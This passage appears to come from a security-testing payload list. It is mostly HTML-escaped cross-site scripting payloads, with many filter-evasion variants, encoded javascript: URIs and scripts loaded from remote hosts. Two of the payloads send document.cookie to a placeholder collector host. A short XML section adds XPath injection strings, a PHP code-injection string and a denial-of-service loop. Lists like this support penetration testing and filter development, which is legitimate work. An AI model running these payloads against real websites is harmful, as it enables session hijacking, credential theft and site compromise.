&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
